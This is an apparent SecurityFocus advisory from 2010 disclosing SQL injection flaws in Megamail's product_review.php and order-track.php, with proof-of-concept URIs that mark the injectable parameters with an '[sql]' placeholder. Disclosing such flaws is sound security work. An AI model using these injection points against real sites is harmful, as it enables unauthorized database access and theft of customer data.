Megamail Product_Review.PHP Multiple SQL Injection Vulnerabilities

An attacker can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://example.com/mega-mall/product_review.php?t=[sql]
http://example.com/mega-mall/product_review.php?t=0&productId=[sql]
http://example.com/mega-mall/product_review.php?t=0&productId=1004&sk=[sql]
http://example.com/mega-mall/product_review.php?t=0&productId=1004&t=0&x=[sql]
http://example.com/mega-mall/product_review.php?t=0&productId=1004&sk=USERID&so=[sql]
http://example.com/mega-mall/order-track.php?Enter=1&orderNo=[sql]


 

Privacy Statement
Copyright 2010, SecurityFocus